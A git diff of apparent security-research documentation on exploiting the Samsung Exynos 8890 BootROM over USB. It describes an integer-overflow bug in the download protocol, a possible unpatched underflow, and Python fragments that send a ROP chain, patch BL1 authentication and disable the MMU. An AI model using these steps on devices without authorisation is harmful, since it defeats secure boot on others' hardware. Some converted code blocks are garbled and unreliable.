diff --git a/README.md b/README.md
index d2c353d..7aa7434 100644
--- a/README.md
+++ b/README.md
@@ -23,4 +23,7 @@ make -f devices/samsung_s7/Makefile
Then proceed to move the debugger to `dump/debugger.bin`. To get to work, run `source/exploit/exploit.py`. The launch.json's are located in source/exploit, so its recommended to open this folder in your VSCode/favourite IDE.
### Viewing/building documentation
-To view documentation, ensure you have sphinx installed. If not, run `sudo apt install python3-sphinx`. Then proceed to build the documentation by running `make livehtml` in `documentation`.
\ No newline at end of file
+To view documentation, ensure you have sphinx installed. If not, run `sudo apt install python3-sphinx`. Then proceed to build the documentation by running `make livehtml` in `documentation`.
+
+## Pushing documentation to confluence
+Run `sphinx-build -b confluence source _build/confluence` from documentation/ to push docs to confluence. They will appear in the DT_Sphinx space. If running issues, be sure to remove the '_build' folder and try again!
\ No newline at end of file
diff --git a/documentation/.~lock.exynos_exploit_chain.odg# b/documentation/.~lock.exynos_exploit_chain.odg#
deleted file mode 100644
index b800641..0000000
--- a/documentation/.~lock.exynos_exploit_chain.odg#
+++ /dev/null
@@ -1 +0,0 @@
-,jonathan,1kqdsx3-l,23.08.2024 11:35,file:///home/jonathan/.config/libreoffice/4;
\ No newline at end of file
diff --git a/documentation/Makefile b/documentation/Makefile
index fd09622..e93a242 100644
--- a/documentation/Makefile
+++ b/documentation/Makefile
@@ -13,6 +13,9 @@ BUILDDIR = build
help:
@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
+confluence:
+ @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" -E -a $(O)
+
.PHONY: help Makefile
livehtml:
diff --git a/documentation/_build/confluence/.cache_confluence_config b/documentation/_build/confluence/.cache_confluence_config
new file mode 100644
index 0000000..3f8d44e
--- /dev/null
+++ b/documentation/_build/confluence/.cache_confluence_config
@@ -0,0 +1 @@
+{"hash": "23bc85713aeb2ef093eda071313cc8bc57509988f49973c4234ac4d9a94cc99d"}
\ No newline at end of file
diff --git a/documentation/_build/confluence/.cache_confluence_dochash b/documentation/_build/confluence/.cache_confluence_dochash
new file mode 100644
index 0000000..71b4b78
--- /dev/null
+++ b/documentation/_build/confluence/.cache_confluence_dochash
@@ -0,0 +1 @@
+{"BootROM_8890/01_start": "646fdd9dfa95f318f95410cdd89da6f141cd2ec81a924baaa8ea4451e8a89bc0", "BootROM_8890/02_frederics_exploit": "836eaf31227b51f67d44ededc2f5bc094ecd6b536c61959ba812edb1fbedf03d", "BootROM_8890/03_exploit_boot_chain": "a45ee44296c16624fafa979a90cc1efea179119c1f765ccd6ed62a2e7448b0b4", "BootROM_8890/04_notes": "b18e488a60b63c232c39d00ba09877caff4bf846400e2c47c08fa17eba1ff0e6", "index": "b0809c6b5260a9da5c501beb8c077ab83786dbe3e371931ab45e23b93f316ec8"}
\ No newline at end of file
diff --git a/documentation/_build/confluence/.cache_confluence_publish b/documentation/_build/confluence/.cache_confluence_publish
new file mode 100644
index 0000000..bd03b57
--- /dev/null
+++ b/documentation/_build/confluence/.cache_confluence_publish
@@ -0,0 +1 @@
+{"index": "187979570", "BootROM_8890/01_start": "187979572", "BootROM_8890/02_frederics_exploit": "187979553", "BootROM_8890/03_exploit_boot_chain": "187979576", "BootROM_8890/04_notes": "187979578"}
\ No newline at end of file
diff --git a/documentation/_build/confluence/.doctrees/BootROM_8890/01_start.doctree b/documentation/_build/confluence/.doctrees/BootROM_8890/01_start.doctree
new file mode 100644
index 0000000..baed073
Binary files /dev/null and b/documentation/_build/confluence/.doctrees/BootROM_8890/01_start.doctree differ
diff --git a/documentation/_build/confluence/.doctrees/BootROM_8890/02_frederics_exploit.doctree b/documentation/_build/confluence/.doctrees/BootROM_8890/02_frederics_exploit.doctree
new file mode 100644
index 0000000..14fe42a
Binary files /dev/null and b/documentation/_build/confluence/.doctrees/BootROM_8890/02_frederics_exploit.doctree differ
diff --git a/documentation/_build/confluence/.doctrees/BootROM_8890/03_exploit_boot_chain.doctree b/documentation/_build/confluence/.doctrees/BootROM_8890/03_exploit_boot_chain.doctree
new file mode 100644
index 0000000..ba5d3f1
Binary files /dev/null and b/documentation/_build/confluence/.doctrees/BootROM_8890/03_exploit_boot_chain.doctree differ
diff --git a/documentation/_build/confluence/.doctrees/BootROM_8890/04_notes.doctree b/documentation/_build/confluence/.doctrees/BootROM_8890/04_notes.doctree
new file mode 100644
index 0000000..f965b1a
Binary files /dev/null and b/documentation/_build/confluence/.doctrees/BootROM_8890/04_notes.doctree differ
diff --git a/documentation/_build/confluence/.doctrees/environment.pickle b/documentation/_build/confluence/.doctrees/environment.pickle
new file mode 100644
index 0000000..d734af0
Binary files /dev/null and b/documentation/_build/confluence/.doctrees/environment.pickle differ
diff --git a/documentation/_build/confluence/.doctrees/index.doctree b/documentation/_build/confluence/.doctrees/index.doctree
new file mode 100644
index 0000000..de871f9
Binary files /dev/null and b/documentation/_build/confluence/.doctrees/index.doctree differ
diff --git a/documentation/_build/confluence/BootROM_8890/01_start.conf b/documentation/_build/confluence/BootROM_8890/01_start.conf
new file mode 100644
index 0000000..c00bc0a
--- /dev/null
+++ b/documentation/_build/confluence/BootROM_8890/01_start.conf
@@ -0,0 +1,18 @@
+
The Exynos 8890 BootROM is a small piece of code that runs on the Exynos SoC at boot runtime. It is responsible for initializing the hardware and loading the first stage bootloader from storage. The BootROM is stored in a read-only memory and cannot be modified.
Be sure to use the correct firmware and firmware version for your S7 when trying this exploit/Frederic’s recovery boot (otherwise the booting will likely fail after sending BL31)!
Protections
+
There are no stack canaries or guard pages, and no ASLR. Meaning there are almost no protections in place. There is however an SMC and a MMU. The SMC is used to communicate with the secure world, and the MMU is used to map the memory.
Rom is at address 0x0 and is unwritable (Sometimes this is writeable due to MMU caching) and is 0x20000 bytes long.
Samsung Firmware
+
Samsung releases firmware files for their devices. These files contain the bootloader, modem, and other firmware files. To see how the ROM works we are interested in the sboot firmware, which contains multiple stages of the bootloader.
These files can then be used to boot the device into USB recovery. To extract the sboot.bin file from a samsung firmware file:
The memory layout of the Exynos 8890 is as follows:
Download protocol
+
When the ROM is unable to boot from the internal storage, it enters Exynos Recovery Mode.
In this mode the bootROM accepts data over USB. There is little functionality other than receiving data, meaning almost no additional attack surface except for the download protocol.
The Exynos BootROM uses a custom protocol to download a bootable image over USB. This image is verified and executed by the BootROM. Unauthorized images are rejected. Initial authorisation is done using the ‘_auth_bl1’ function. Frederic has exploited a vulnerability in the download protocol to load Unauthorized images.
\ No newline at end of file
diff --git a/documentation/_build/confluence/BootROM_8890/02_frederics_exploit.conf b/documentation/_build/confluence/BootROM_8890/02_frederics_exploit.conf
new file mode 100644
index 0000000..503cbbb
--- /dev/null
+++ b/documentation/_build/confluence/BootROM_8890/02_frederics_exploit.conf
@@ -0,0 +1,94 @@
+
The bootRom is the first code that runs on the Exynos SoC. It is responsible for initializing the hardware and loading the first stage bootloader from storage. The BootROM is stored in a read-only memory and cannot be modified (making vulnerabilities in this permanent/non-patcheable). The BootROM is responsible for initializing the USB controller and receiving the first stage bootloader from the USB host. It will be waiting for a package in the following format (dldata == download data):
dldata
+
A key For uploading a stage to boot, a custom protocol is used. The dldata that has to be send is 512 bytes long, and has the following format:
+
+
The dldata packet is used to send data to the BootROM.
+
+
The size in the packet is the total size of the packet, including header and footer. If we modify this, we will have a payload size of around 502 bytes.
+
This protocol remains mostly the same for newer Exynos SoCs.
+
+
USB Controller / DWC3
+
The Exynos 8890 uses the Synopsys DesignWare USB 3.0 controller. Much of the code is shared with the DWC3 driver in the Linux kernel, except that the ROM does not do any scheduling and a lot of features have been removed(OTG handling, etc).
The base address of the usb controller (dwusb3) is mapped at 0x1540000, with a size of 0x10000: (can be found at: Exynos8890 dtsi).
This is a basic USB controller, but some functions, that are also present in the linux kernel, should be visible in the bootROM as well. Available functions could be: linux-kernel-dwc3.
The USB host sends a USB_REQ_SET_ADDRESS, ‘0x05’, which the connected device has to acknowledge, and will then start sending data to this address. Initially, the device will send data to ‘0x00’.
+cpp
+false
+
+
+
Ghidra shows DWC3_DCFG & 0xfffffc00 | DWC3_DCFG & 7 | (param_1 & 0x7f) << 3;, essentially preserves bits 0-2 and 10-31, and sets bits 3-9 to the value of param_1, which is then likely the address of the device.
bootrom exynos 8890 dwc3_dcfg_devaddr
+
+
Other general device descriptors are also sent from the device to the host (to describe the device), these are visible in/at ‘usb_init_device_descriptor’ (6098) and usb_init_descriptors (610c). Two end point addresses are visible: bEndpointAddress 0x81 and 0x02. 0x81 is 10000001 in binary, with bit 7 being ‘1’, which means that the bulk transfer direction is IN. 0x02 is 00000010 in binary, with bit ‘7’ being ‘0’, which means that the bulk transfer direction is OUT.
Data is transferred via Transfer Request Blocks (TRB), dwc3_depcmd_starttransfer is used. The TRB then contains a buffer address, where transferred data from the host is written to. The buffer allocation is done by ‘usb_setup_event_buffer’, which sets bufferHigh (DWC3_GEVNTADRLO), bufferLow (DWC3_GEVNTADRHI) and bufferSize (DWC3_GEVNTSIZ).
Bug 1 (Integer overflow)
+
Originally described in this blogpost. Our if-statement is written a bit different, but boils down to the same thing.
The exynos bootrom uses a simple USB protocol to receive a bootloader binary from a USB host. The binary sent is called ‘dldata’. In Ghidra, at 21518, we can see that it consists of unit32_t: ready?, uint32: size, ? : data, uint16: footer. The contents of this data are checked before being being written.
+
+
The ready flag is set to 0 in the Exynos 8890 BootROM in an earlier function on pdVar1->size (pdVar1.size)
In essence, the payload is not allowed to be larger than 0x206fff (34013183), it checks so with 2 seperate checks 1) In the first condition, the size has to be smaller than 0x206ffff (pdVar1->size < 0x206ffff) (34013183 in decimal), 2) and in the second condition, it checks whether 0x206ffff is indeed still less than the size of the payload + remaining (size + remaining)(0x206ffff < pdVar1->size + remaining).
If both conditions are met, the payload will NOT be loaded. But this makes sense, as both checks just ensure that the payload is not larger than 0x206ffff.
The bug is however, that the check that the check is done on a uint32_t (2^32 = 4294967296), but the max value that can be checked by a uint32 is 0xFDFDE7FF = 4294967295. So a value of 0xFDFDE7FF + 1 = 0xFDFDE800 = 4294967296, which is larger than the max value of a uint32. So if a payload of this size or more is used, which is much larger than the max requested value 0x206ffff, the check will pass and the payload will still be loaded.
+
+
The size check in the Exynos 8890 BootROM
+
+
Sending such large amounts of data can cause a memory overflow, and will cause the target to crash. Not interesting for exploitation in this context. However, the USB packages that are sent, are split into smaller packages with a size of 0xFFFE00.
+
+
The max allowed chunk size, after which the payload is split.
+
+
The dl_buf pointer is set to the amount it expects to write, instead to the amount that it has written. By transferring a large amount of data, without actually writing it (so in a package, send no data, but tell the target that you’re sending data with a length larger than 0xFDFDE800), will cause the pointer to move, without actually writing data.
The trick then becomes, to get the pointer to an address we would like to exploit unto. Then we have a little less than 512 bytes (502 according to dldata) to write our payload.
+cpp
+false
+
+
+
Bug 2
+
+
Might be a 0/N-day if exploitable
+
+
There is a bug(unpatched?) in receiving the last packet of the usb image:
+
+
The bug is an integer underflow in the calculation of the remaining size of the image.
+
diff --git a/documentation/_build/confluence/BootROM_8890/03_exploit_boot_chain.conf b/documentation/_build/confluence/BootROM_8890/03_exploit_boot_chain.conf
new file mode 100644
index 0000000..9878293
--- /dev/null
+++ b/documentation/_build/confluence/BootROM_8890/03_exploit_boot_chain.conf
@@ -0,0 +1,281 @@
+
This part describes the boot chain of the Exynos 8890 SoC.
+
This is all still under development and will change.
+
+
General overview
+
Memory layout
+
Keep this overview in mind when reading through the boot chain exploit.
Approach
+
In our initial approach, we were manually booting all stages from the debugger, and jumping directly back to the debugger (without using the USB protocol). This was done to keep the debugger alive throughout the boot chain, but this became very difficult after BL31, as the MMU didn’t allow us to read/write to most spaces, cutting off our access to BL31 during boot at some point. And losing our debugger interface in the process.
This is also why there is some ghost code within the project. We were trying to keep the debugger alive throughout the boot chain, but this was not easily feasible.
Unsure. Contains strings like: TOP_DIV_ACLK_MFC_600 and APOLLO_DIV_APOLLO_RUN_MONITOR
+
BL2?
+
+
+
sboot.bin.4.bin
+
Contains more textual information, and references to post BL2 boot, and android information
+
Kernel boot/BL33?
+
+
+
+
Gupje
+
+
Gupje is the debugger we’ll be loading onto the device and will be moving around throughout the bootchain.
+
+
Gupje needs to be built and loaded onto the device. Throughout the exploit, we’ve been moving the debugger to different spaces in memory on the device. This was necessary as the space we initially used, was in the way of the space used for BL31 or BL2. After BL31, we lost access to the debugger, as BL2 was overwriting our last available space. At some point we moved the debugger to 0x11200000, as we saw that this space was used by BL31. Here below the most important arguments to build the debugger. This space is executable when the MMU is off.
Here the linksript.txt file.
+bash
+false
+
+
+
And the symbols.ld file.
+bash
+false
+ROM
+
+}]]>
+
+
Debuggers
+
After initial exploitation the goal was to fully boot the device. We’re now moving into the next phase: 1) loading a debugger 2) and then to continue booting the device. If we manage to keep access to the debugger throughout the boot, this gives us room to exploit the device. But, the debugger needs to be kept ‘alive’ through the boot chain. The main difficulties here are the location of the debugger in memory (as it gets overwritten) and the MMU being enabled after BL31.
Initial debugger
+
The initial debugger is written to 0x2069000, with debugger_stack and _storage at 0x0206b000 and 0x0206d000 respectively.
After the initial loading of the debugger, the processor state reported is (using ghidra assistant):
+bash
+false
+
+
+
LR/X30 being the line register. This is the address the processor will jump to when the function is done (important to keep track off).
Second debugger
+
After a cache flush, the debugger seems to be cleared as well, so the debugger is relocated to 0x20c0000, with _stack and _storage now at 0x20c2000 and 0x20c4000 respectively. This is done by running:
+python
+false
+
+
+
The processor state reported then is:
+bash
+false
+
+
+
Final debugger
+
We searched for quite some time for a space which was both writeable and executable. After BL31, most space became unreachable, with the MMU not allowing read/write at most spaces. We tried putting the debugger in the GPU cache, and tried some other spaces visible in the dtsi files, but eventually we found a space at 0x11200000. This space is executable when the MMU is off. With the MMU on, we can read/write but not execute here.
Python part
+
Python code to setup the debugger.
+python
+false
+
+
+
Stage 1 - Initial exploit
+
Frederic created a payload called ‘Exynos8890dump_bootrom’, which used the usb dwc3 protocol (USB Synopsys DesignWare USB 3.0), to read and dump the bootrom. This payload was slightly modified, to keep the USB connection alive (stage1.bin). Frederic’s C code was implemented in python.
+python
+false
+= xfer_buffer_start and current_offset < xfer_buffer_start:
+ break
+ self.send_empty_transfer()
+ current_offset += CHUNK_SIZE
+ cnt += 1
+ if current_offset > 0x100000000:
+ current_offset = current_offset - 0x100000000 #reset 32 byte integer
+ print(f"{cnt} {hex(current_offset)}")
+
+ remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
+ assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
+ if remaining > BLOCK_SIZE:
+ self.send_empty_transfer()
+ # Send last transfer, TODO who aligns this ROM??
+ current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
+ cnt += 1
+ print(f"{cnt} {hex(current_offset)}")
+
+ # Build ROP chain.
+ rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
+ transferred = ctypes.c_int(0)
+ res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
+ assert res == 0, "Error sending ROP chain"
+ return]]>
+
+
After this exploitation, we’re able to send custom payloads. The first payload that is sent, sets up the debugger. In order to run the debugger, a small amount of the bootROM was reversed in order to implement send/recv functionality.
@EljakimHerrewijnen: what send/recv did you reverse? What code from the bootROM did you reverse?
Stage 2 - BL1
+
Here, in order, the patches we applied to get BL1 to boot:
+
+
Boot chain
+
+
+
+
Overwrite the USB return address pointer (0x02020f60) to jump back to the debugger. self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))
+
+
Set link register to debugger and jump into the boot USB (0x000064e0) function. self.cd.arch_dbg.state.LR = DEBUGGER_ADDR and then self.cd.restore_stack_and_jump(0x000064e0)
+
+
Now we can send the BL1 binary to the device. self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read()). At this point, we retain access to the debugger.
+
+
To patch the authentication, we set X0 and X1 to 1, then again set the link register to the debugger, and jump into the authentication function at 0x00012848. self.cd.arch_dbg.state.X0 = 1 and self.cd.arch_dbg.state.X1 = 1 and self.cd.arch_dbg.state.LR = lr and then self.cd.restore_stack_and_jump(0x00012848)
+
+
We flush the cache self.usb_write(b"FLSH") (Frederic did this as well).
+
+
Now we hijack the USB download function to jump back to the debugger. self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) and self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
+
+
And finally, we again restore our link register to the debugger, and jump into BL1 self.cd.restore_stack_and_jump(0x000002c0)
+
+
+
+
Overview of the initial boot function in the Exynos 8890.
+
+
At this point, after loading and executing BL1, the device returns to the debugger. Normally, the device would boot into BL1, and would then wait for the next boot stage to be sent over USB. But because we hijacked the USB return address pointer, the device returns to the debugger.
Regarding auth_bl1: Initially we thought that 0x0 indicated a verified boot state (as is plausible when reading the decompiled code in Ghidra). But after modifying BL1 in the header and contents, this value did not change.
+
git commit 8cb5f2e1 fully boots, you can use this commit to patch BL1 only.
+
+
Stage 3 - BL31
+
Initial boot through BL31
+
Next up is BL31, which is loaded by BL1. BL31 is written at 0x02024000 with the entry point at 0x02024010, it ends at 0x02048000. BL31 is the secure monitor. The monitor uses memory that is also being used by the debugger, so we will have to relocate it to keep code exeuction.
+
+
Example of BL31 using memory from the initial debugger.
+
+
BL31 also configures the VBAR_EL3 and MMU so the memory mapping will probably change after this stage (preparation for trustzone?). Here we decided to move the debugger to 0x02048000, as this space is still accessible after BL31, but this space will get overwritten by BL2.
At this point we switched our approach to booting the device, as we were unable to keep the debugger alive throughout the boot chain. We now boot the device normally, and then try to get our debugger after booting each stage. Because of this, we didn’t need to modify a lot after BL1. Essentially all we did was:
+
+
Set the link register to the debugger: self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
+
+
Jump into our hijacked USB function: self.cd.restore_stack_and_jump(hijacked_fun)
Continue a function that BL1 called via the USB: self.cd.restore_stack_and_jump(0x2022948)
+
+
Jump into BL31: self.cd.restore_stack_and_jump(0x02024010)
+
+
This boot process restores us to the debugger, but after this, we’re unable to access most memory spaces. Notably, we tried getting access to the TTBR0_EL3. But something prohibits us reading there. We weren’t able to find any executable space that was still available, for after BL2. BL2 would overwrite our debugger at this point.
Patching BL31
+
While looking for flags which were used for the MMU, we found a function at 0x020244e8 which we were able to turn off, but which still allowed a full boot into recovery. The MMU however stated to being disabled.
+
+
get special registers: self.cd.arch_dbg.fetch_special_regs()
+
+
MMU state: self.cd.arch_dbg.state.R_SCTLR_EL3.mmu
+
+
+
+
Function patheable that turns off MMU, but keeps boot intact.
+
+
Additionally we found a space at 0x11207010, while looking for bit flags in ghidra, which seemed to be a memory read/write space. This space was not executable, unless the MMU was turned off. We used this space to store our debugger, then before booting BL31, we patched the if-statement above to disable the MMU. And booted.
+
+
Patch if-statement to not be met: self.cd.memwrite_region(0x020244e8, struct.pack('>I', 0x1f0c00f1))
+
+
Jump into BL31: self.cd.restore_stack_and_jump(0x02024010)
+
+
Stage 4 - BL2
+
This is our current progress. BL2 has booted, and shows the VBAR’s for EL1.
+bash
+false
+
+
+
Stage 5 - BL33
+
The last stage before the kernel boots.
+
+
Boot chain with EL3 and EL1 areas
+
diff --git a/documentation/_build/confluence/BootROM_8890/04_notes.conf b/documentation/_build/confluence/BootROM_8890/04_notes.conf
new file mode 100644
index 0000000..0f01e17
--- /dev/null
+++ b/documentation/_build/confluence/BootROM_8890/04_notes.conf
@@ -0,0 +1,143 @@
+
General notes on interesting/peculiar things found on the S7 USB recovery boot process
Emulator
+
What is interesting about the ROM is that it starts by checking MPIDR_EL1 register and doing a conditional branch to 0x20e0000.
At this point, we assumed that the authentication was succesful, and the bootROM would jump back to the debugger after loading, but this was not the case. After running this function, we were able to send a single packet, but never received a response. Indicating that the function we were executing never returned on us.
+
+
BL1 authentication
+
+
If authentication at auth_bl1 is succesful, the returns a value from a function at 1230c. This function does some things, but eventually jumps to a function at:
+
+
BL1 authentication
+
+
After authentication the bootROM jumps to this function at, we can execute this function with the debugger.
+python
+false
+
+
+
BL1 is loaded at the download buffer and self copies to 0x02022000 and resumes execution there, with a size of 0x2000 (0x02022000 to 0x02024000).
However, this does not result in a jump back to the debugger. But the ROM still allows receival of one data package from the USB host (this is likely the system ‘waiting’ to receive the bootloader).
By adding the IMEM to ghidra, we can have a look at what is going here. After having modified the LR to jump back to the debugger and jumping into auth_bl1 at 0x00012848 we jump back to the debugger. Jumping into BL1 at 2c0 does not return us to the debugger. Here we need to hijack 020200dc and 02021880 we’re able to boot into BL1. We store the address of the hijacked function, to restore it later for a proper boot flow.
+python
+false
+
+
+
Authentication of BL1 seems to be done at 0x0012848. With return value ‘0’ expected when this function is executed, to execute other functions.
+
+
BL1 authentication.
+
+
purpose
+
bl1 interacts with several pheriperals, from the DTB these are:
Probably the only thing it does is set some clocks and prepare for BL31.
The reason for this is the following code in bl1:
+cpp
+false
+
+
+
This code uses a predefined ROM function(I was looking for it) and jumps back to that function when it’s done. This function is at address 0x020200e8, looking in our IMEM dump we can see where in the ROM this points to:
+cpp
+false
+
+
+
Replacing this function with our debugger makes us jump back:
+python
+false
+
+
+
However this does not fully run bl1, so we will have to dig a bit deeper to see the puropose and when to jump back to the debugger.
Week 35 - 2024
+
After booting BL31, the MMU seems to be set up, and we’re unable to do get any data off of spaces we’re not ‘allowed’ to access. Patching the if-statement at 0x020244e8, disables the bit that says that the MMU is setup, but booting into recovery is possible (meaning the MMU is setup). Additionally, the memory at 0x02035600 is still not dumpable. At 0x02048000 is still accessible.
Weird space found at 0x105c2400. Seems to contain references to usb buffer (about 48-64 bytes). Also space at 0x020307f0, but I lose access to this after booting
The debugger at 0x11200000 can only dump 0x768 at a time (its space related. Before BL31 this is also an issue.).
There’s an odd space at 0x14kk. With things like deadcafe:
+python
+false
+
+
diff --git a/documentation/_build/confluence/_static/drawio.css b/documentation/_build/confluence/_static/drawio.css
new file mode 100644
index 0000000..5e555eb
--- /dev/null
+++ b/documentation/_build/confluence/_static/drawio.css
@@ -0,0 +1,8 @@
+img.drawio {
+ border: 0;
+ max-width: 100%;
+}
+
+object.drawio {
+ max-width: 100%;
+}
\ No newline at end of file
diff --git a/documentation/_build/confluence/index.conf b/documentation/_build/confluence/index.conf
new file mode 100644
index 0000000..ec08608
--- /dev/null
+++ b/documentation/_build/confluence/index.conf
@@ -0,0 +1,111 @@
+
Documentation on Samsung devices, currently mainly the Samsung S7. Here we’re exploiting the Exynos 8890, which is present on both the Samsung S7 and the MIB3 High (VAG).
BootROMs:
+
+
+
+
+Start/Home
+
+
+
+
+Protections
+
+
+
+
+Samsung Firmware
+
+
+
+
+Memory Layout
+
+
+
+
+Download protocol
+
+
+
+
+
+
+Frederic’s Exploit
+
+
+
+
+USB Stack in BootROM
+
+
+
+
+
+
+Exploit boot chain
+
+
+
+
+General overview
+
+
+
+
+Debuggers
+
+
+
+
+Stage 1 - Initial exploit
+
+
+
+
+Stage 2 - BL1
+
+
+
+
+Stage 3 - BL31
+
+
+
+
+Stage 4 - BL2
+
+
+
+
+Stage 5 - BL33
+
+
+
+
+
+
+Notes
+
+
+
+
+Emulator
+
+
+
+
+BL1 peculiarities
+
+
+
+
+Week 35 - 2024
+
+
+
+
+Week 36 - 2024
+
+
+
+
diff --git a/documentation/_build/confluence/objects.inv b/documentation/_build/confluence/objects.inv
new file mode 100644
index 0000000..014961f
Binary files /dev/null and b/documentation/_build/confluence/objects.inv differ
diff --git a/documentation/_build/confluence/svgs/484c133648e1cadce9ac668f651d7a7a3be4730c319f3413d0ce2c72099478f6.svg b/documentation/_build/confluence/svgs/484c133648e1cadce9ac668f651d7a7a3be4730c319f3413d0ce2c72099478f6.svg
new file mode 100644
index 0000000..b1dcd74
--- /dev/null
+++ b/documentation/_build/confluence/svgs/484c133648e1cadce9ac668f651d7a7a3be4730c319f3413d0ce2c72099478f6.svg
@@ -0,0 +1,2 @@
+
+
\ No newline at end of file
diff --git a/documentation/_build/confluence/svgs/f058c2f596741fd06339c24e16eb4f45fad7676c43c34240d2094962cb034211.svg b/documentation/_build/confluence/svgs/f058c2f596741fd06339c24e16eb4f45fad7676c43c34240d2094962cb034211.svg
new file mode 100644
index 0000000..a4b15b8
--- /dev/null
+++ b/documentation/_build/confluence/svgs/f058c2f596741fd06339c24e16eb4f45fad7676c43c34240d2094962cb034211.svg
@@ -0,0 +1,2 @@
+
+
\ No newline at end of file
diff --git a/documentation/exynos_exploit_chain.odg b/documentation/exynos_exploit_chain.odg
index 01205f5..bf5756e 100644
Binary files a/documentation/exynos_exploit_chain.odg and b/documentation/exynos_exploit_chain.odg differ
diff --git a/documentation/source/BootROM_8890/02_frederics_exploit.rst b/documentation/source/BootROM_8890/02_frederics_exploit.rst
index 041ab68..81dab56 100644
--- a/documentation/source/BootROM_8890/02_frederics_exploit.rst
+++ b/documentation/source/BootROM_8890/02_frederics_exploit.rst
@@ -14,9 +14,9 @@ dldata
A key For uploading a stage to boot, a custom protocol is used. The dldata that has to be send is 512 bytes long, and has the following format:
.. figure:: images/dl_packet.drawio.svg
- :align: center
+ :align: center
- The dldata packet is used to send data to the BootROM.
+ The dldata packet is used to send data to the BootROM.
The size in the packet is the total size of the packet, including header and footer. If we modify this, we will have a payload size of around 502 bytes.
diff --git a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
index 82b5482..d146381 100644
--- a/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
+++ b/documentation/source/BootROM_8890/03_exploit_boot_chain.rst
@@ -8,7 +8,7 @@ This part describes the boot chain of the ``Exynos 8890`` SoC.
This is all still under development and will change.
General overview
-===============
+================
Memory layout
^^^^^^^^^^^^^
@@ -175,7 +175,7 @@ Python code to setup the debugger.
self.cd.test_connection()
Stage 1 - Initial exploit
-===============
+=========================
Frederic created a payload called 'Exynos8890dump_bootrom', which used the usb dwc3 protocol (USB Synopsys DesignWare USB 3.0), to read and dump the bootrom. This payload was slightly modified, to keep the USB connection alive (stage1.bin). Frederic's C code was implemented in python.
.. code:: python
@@ -239,7 +239,7 @@ After this exploitation, we're able to send custom payloads. The first payload t
@EljakimHerrewijnen: what send/recv did you reverse? What code from the bootROM did you reverse?
Stage 2 - BL1
-==========
+=============
Here, in order, the patches we applied to get BL1 to boot:
.. figure:: images/boot_chain_bl1.drawio.svg
@@ -257,9 +257,9 @@ Here, in order, the patches we applied to get BL1 to boot:
.. figure:: images/initial_boot_function.png
- :align: center
+ :align: center
- Overview of the initial boot function in the Exynos 8890.
+ Overview of the initial boot function in the Exynos 8890.
At this point, after loading and executing BL1, the device returns to the debugger. Normally, the device would boot into BL1, and would then wait for the next boot stage to be sent over USB. But because we hijacked the USB return address pointer, the device returns to the debugger.
@@ -315,6 +315,7 @@ Stage 4 - BL2
This is our current progress. BL2 has booted, and shows the VBAR's for EL1.
.. code:: bash
+
MMU is 0x0 (0x1=enabled, 0x0=disabled)
TTBR0_EL3: 0xbc4650892f1460, TTBR1_EL2: 0xc54d39cb66f0, TTBR0_EL1: 0xa5c20fc0ac581142
VBAR_EL3: 0x2031800, VBAR_EL2: 0x0, VBAR_EL1: 0x2053800
diff --git a/documentation/source/BootROM_8890/04_notes.rst b/documentation/source/BootROM_8890/04_notes.rst
index aa16e3e..b20d806 100644
--- a/documentation/source/BootROM_8890/04_notes.rst
+++ b/documentation/source/BootROM_8890/04_notes.rst
@@ -19,14 +19,13 @@ What is interesting about the ROM is that it starts by checking MPIDR_EL1 regist
BL1 peculiarities
-----------------
+At this point, we assumed that the authentication was succesful, and the bootROM would jump back to the debugger after loading, but this was not the case. After running this function, we were able to send a single packet, but never received a response. Indicating that the function we were executing never returned on us.
.. figure:: images/bl1_auth_references.png
:align: center
BL1 authentication
-At this point, we assumed that the authentication was succesful, and the bootROM would jump back to the debugger after loading, but this was not the case. After running this function, we were able to send a single packet, but never received a response. Indicating that the function we were executing never returned on us.
-
If authentication at auth_bl1 is succesful, the returns a value from a function at ``1230c``. This function does some things, but eventually jumps to a function at:
.. figure:: images/bl1_auth_follow-up_1230c.png
@@ -55,6 +54,7 @@ However, this does not result in a jump back to the debugger. But the ROM still
By adding the IMEM to ghidra, we can have a look at what is going here. After having modified the LR to jump back to the debugger and jumping into auth_bl1 at ``0x00012848`` we jump back to the debugger. Jumping into BL1 at ``2c0`` does not return us to the debugger. Here we need to hijack ``020200dc`` and ``02021880`` we're able to boot into BL1. We store the address of the hijacked function, to restore it later for a proper boot flow.
.. code:: python
+
auth_bl1(DEBUGGER_ADDR)
self.usb_write(b"FLSH") # Flush cache
hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4))
@@ -66,9 +66,9 @@ By adding the IMEM to ghidra, we can have a look at what is going here. After ha
Authentication of BL1 seems to be done at ``0x0012848``. With return value '0' expected when this function is executed, to execute other functions.
.. figure:: images/bl1_auth_references.png
- :align: center
+ :align: center
- BL1 authentication.
+ BL1 authentication.
purpose
^^^^^^^
@@ -134,30 +134,30 @@ Replacing this function with our debugger makes us jump back:
.. code-block:: python
- # Overwrite jump back
+ # Overwrite jump back
self.cd.memwrite_region(0x02020108, p32(0x2069000))
self.cd.memwrite_region(0x020200e8, p32(0x2069000))
-
+
def jump_bl1():
- self.cd.arch_dbg.state.LR = 0x2069000
- self.cd.restore_stack_and_jump(0x02024010)
- # self.cd.restore_stack_and_jump(0x02021810)
-
+ self.cd.arch_dbg.state.LR = 0x2069000
+ self.cd.restore_stack_and_jump(0x02024010)
+ # self.cd.restore_stack_and_jump(0x02021810)
+
bl1 = open("../S7/bl1.bin", "rb").read()
